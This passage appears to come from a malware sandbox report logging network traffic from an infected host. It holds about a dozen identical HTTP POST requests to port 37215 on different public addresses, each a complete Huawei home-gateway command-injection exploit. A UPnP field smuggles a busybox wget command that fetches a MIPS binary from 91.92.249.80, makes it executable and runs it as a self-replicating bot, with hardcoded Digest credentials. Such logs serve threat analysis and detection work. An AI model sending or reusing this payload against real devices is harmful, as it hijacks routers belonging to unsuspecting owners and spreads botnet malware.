                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1654192.168.2.2353896197.39.128.25237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.511646986 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1655192.168.2.2352530157.112.11.9837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.511926889 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1656192.168.2.23337444.144.114.24137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.512327909 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1657192.168.2.2339094197.155.222.23737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.512331963 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1658192.168.2.2339552197.190.201.24137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.512547970 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1659192.168.2.234314041.12.245.3037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.512618065 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1660192.168.2.2341876197.200.201.14737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.512660027 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1661192.168.2.2351102197.219.97.337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.512777090 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1662192.168.2.2339024197.56.247.5037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.513091087 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1663192.168.2.2338270197.27.138.24737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.513104916 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1664192.168.2.2355414157.184.82.637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.513143063 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
